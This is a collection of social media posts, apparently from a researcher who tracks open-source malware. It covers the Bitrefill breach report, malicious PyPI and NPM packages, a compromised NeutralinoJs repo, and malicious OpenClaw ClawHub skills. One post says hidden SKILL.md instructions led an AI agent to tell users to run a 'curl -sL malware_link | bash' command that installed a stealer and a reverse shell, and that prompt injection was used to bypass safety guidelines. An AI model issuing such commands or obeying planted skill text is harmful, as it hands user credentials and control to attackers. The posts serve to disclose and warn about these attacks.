eastside mccarty

@0xLupin Yeah buddy!

@eastsidemccarty Hehe thank you ! Looking forward to see you at RSAC

WE DID IT ! WE RAISED $5.9M PRE-SEED 🥳🎉🎉

@bitrefill heya @bitrefill can you go into more detail about the compromised dev? We are tracking 2 APT's targeting GitHub users: PolinRider (DPRK) & Glassworm (Russian). Both force push malicious JavaScript on existing repos. github.com/OpenSourceMalw… Is this consistent with what u saw?

March 1st incident report On March 1, 2026, Bitrefill was the target of a cyberattack. Based on indicators observed during the investigation - including the modus operandi, the malware used, on-chain tracing and reused IP + email addresses (!) - we find many similarities between this attack and past cyberattacks by the DPRK Lazarus / Bluenoroff group against other companies in the crypto industries. The initial access originated through a compromised employee laptop, from which a legacy credential was exfiltrated. That credential provided access to a snapshot containing production secrets. From there, the attackers were able to escalate their access to our broader infrastructure, including parts of our database and certain cryptocurrency wallets. We first detected the incident after noticing suspicious purchasing patterns with certain suppliers. We realized that our gift card stock and supply lines were being exploited. At the same time we found some of our hot wallets being drained and funds transferred to attacker-controlled wallets. The moment we identified the breach, we took all of our systems offline as part of our containment response. Bitrefill operates a global e-commerce business with dozens of suppliers, thousands of products, and multiple payment methods across many countries. Safely switching all these things off and bringing them back online is not trivial. Since the incident, our team has been working closely with top industry security researchers, incident response specialists, on-chain analysts and law enforcement to understand what happened and how we can prevent it from happening again. A sincere thank you to @zeroshadow_io, @SEAL_Org, @RecoverisTeam and @fearsoff for their rapid response and support throughout this ordeal. What about your data Based on our investigation and our logs we don’t have reason to think that customer data was the target of this breach. There is no evidence that they extracted our entire database, only that the attackers ran a limited number of queries consistent with probing to understand what there was to steal, including cryptocurrency and Bitrefill gift card inventory. Bitrefill was designed to store very little personal data. We are a store, not a crypto service provider. We don’t require mandatory KYC. When a customer chooses to verify their account - e.g. to access higher purchasing tiers or certain products - that data is kept exclusively with our external KYC provider, with no backups in our system. Still, based on database logs, we know that a subset of purchase records was accessed and we want to be transparent about that. Around 18,500 purchase records were accessed by the attackers. Those records contained limited customer information, such as email addresses, crypto payment address, and metadata including IP address. For approximately 1,000 purchases, specific products required customers to provide a name. That information is encrypted in our database. However, since the attackers may have gotten access to the encryption keys, we are treating this data as potentially accessed. Customers in this category have already been notified directly by email. At this time, based on the information currently available, we do not believe customers need to take specific action. As a precaution, we recommend remaining cautious of any unexpected communications related to Bitrefill or crypto. If this assessment changes, we will of course immediately inform those affected. What we are doing We have already significantly improved our cybersecurity practices, but vow to continue to draw learnings from this experience to make sure user and company balances and data remain maximally safe. Specifically we’re: -Continuing thorough cybersecurity reviews and pentests with multiple external experts and implementing recommendations; -Further tightening internal access controls; -Further improving logging and monitoring for faster detection and more effective response; and -Continuing to refine and test our incident response procedures and automated shutdown procedures. The bottom line Getting hit by a sophisticated attack sucks (a lot). We’ve been in business for over 10 years and it’s the first time we’ve been hit this hard. But we survived. Bitrefill was designed to limit the impact if something like this ever happened. Bitrefill remains well funded, has been profitable for several years and will absorb these losses from our operational capital. Almost everything is back to normal: payments, stock, accounts. Sales volumes are also back to normal, and we are eternally thankful to our customers for your continued confidence in us. We will continue to do our best to continue deserving your trust. Thank you!

Heya @itsEasonn, your malicious packages on @pypi were taken down. Any comment on why you created packages to steal @discord credentials and nuke Discord servers?

I chased down an NPM user who had published three malicious NPM packages. He claimed ignorance and blamed it all on @openclaw. You know what? I believe him.

@ZackKorman Yeah, I kinda figured this is where you were headed, and I understand. BUT, I will say that my audience on LinkedIn is very technical, and if you ignore the CISO/GRC bullshit on LI, there are definitely good things being said there.

“IceSolst said all of us are smart, so I agreed. You said there’s a group of people who aren’t smart, so I disagree.” It’s fine that your following is on LinkedIn. It’s fine to not trust this site, that also makes perfect sense. But if someone reads the posts on LinkedIn as their only engagement with the cyber community, the odds that they’re particularly clued in or talented is very low. Cyber is an area where it’s super hard to get feedback. For devs, you at least get “did it work” even if you’re a solo dev. For cyber, there’s a lot less info. That makes the community engagement more important.

I went ahead and posted the LinkedIn version of this.

If you use the @NeutralinoJs open source project and have forked since Feb 27, 2026, you are gonna want to check yo shit ASAP. Threat actors compromised a maintainer and tacked a malicious payload onto the end of the spec/runner.js file. github.com/neutralinojs/n…

@IceSolst This is 150% true. I see this underscored in so many ways: The people who show up to my meetups. The talk submissions I grade. The peeps that show up to my training. Brutal, but true.

There’s an astronomical skill gap between good security people, and the rest. There’s no mid. Accounts you see posting their research here are absolutely cracked, it’s not the norm. When you go out and talk to security folks that don’t go to conferences, don’t read up on research, you realize- holy shit. They have no fucking clue. The majority of the cybersecurity work force is absolutely incompetent. It’s partly why vendors can come up with inane bullshit as marketing material and it works on many CISOs. If you’re reading this, you’re most likely 1000x the skill level of the average person. Like I cannot emphasize enough how low the bar is when the sample size is the entire industry.

@fr0gger_ @HackingLZ Hold the phone, as you and I have talked about a lot, LLM skepticism != marketing hype for me. I resist this label that because I’m cautious I’m somehow a troglodyte.

@HackingLZ Thanks!! And yes, we have heard this for years. LLM skepticism is the legacy of years of marketing hype 😅

@chiefofautism I dropped this 3 weeks ago, yo: opensourcemalware.com/blog/clawdbot-…

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

@xshroti @malinvested @grok All of them

@malinvested @grok I'm interested in what vc accounts are being talked about here

Of course that's your contention. You're a first-time SaaS bear. You just got finished listening to some podcast, Dario on Dwarkesh, probably. Now you think it’s the end of white collar work and seat-based pricing is screwed. You're gonna be convinced of that til tomorrow when you get to “Something Big is Happening”. Then you’ll install ClawdBot on a Mac Mini, vibe code a dashboard on top of a postgres database and say we’re all just a couple ralph loops away from building a Salesforce competitor. That’s gonna last until next week when you discover context graphs, and then you're gonna be talking about how the systems of record will be disintermediated by an agentic layer and reposting OAI marketing graphics. “Well, as a matter of fact, I won't, because ultimately the application layer is just ….” The application layer is just business logic on top a CRUD database. You got that from Satya’s appearance on the BG2 pod, December 2024, right? Yeah, I saw that too. Were you gonna plagiarize the whole thing for us? Do you have any thoughts of your own on this matter? Or...is that your thing? You get into the replies of anyone posting a SaaS ticker. You watch some podcast and then pawn it off as your own idea just to impress some VCs and embarrass some anon who’s long SaaS? See the sad thing about a guy like you is in a couple years you're gonna start doing some thinking on your own and you're gonna come up with the fact that there are two certainties in life. One: don't do that. And two: you dropped thirty grand on Mac Minis and LLM API calls to come to the same conclusion you could’ve got for free by following a handful of VC accounts.

@aquariusacquah This tracks for #cryptomuppets

domain: $70M 1 minute superbowl ad: $15M forgetting to turn on autoscaling right before launch: priceless

OpenSourceMalware was featured on the @tldrsec newsletter this week. Thanks @clintgibler for the mention! tldrsec.com/p/tldr-sec-314

Heya @openclaw team? I think someone is copying your website? Right now these downloads are benign, but this looks suss as. @theonejvo

The threat actors who have deployed hundreds of malicious skills to the @openclaw ClawHub registry now have a website.

Introducing "telegrem-bot", a ophisticated 5-stage supply chain attack targeting Python developers. It deploys a fully-featured Remote Access Trojan (RAT) controlled via @telegram, providing complete remote administration capabilities, including file exfiltration, command execution, SSH backdoor installation, token stealing, and mobile device data theft. Read all about it here: getsafety.com/blog-posts/tel…

Another 194 malicious skills were added to ClawHub today: opensourcemalware.com/daily-stats @openclaw

Heya @openclaw, you aren't removing the malicious ClawHub users when you remove their individual packages, so known bad users can just publish more malicious skills like this guy: clawhub.ai/u/zaycv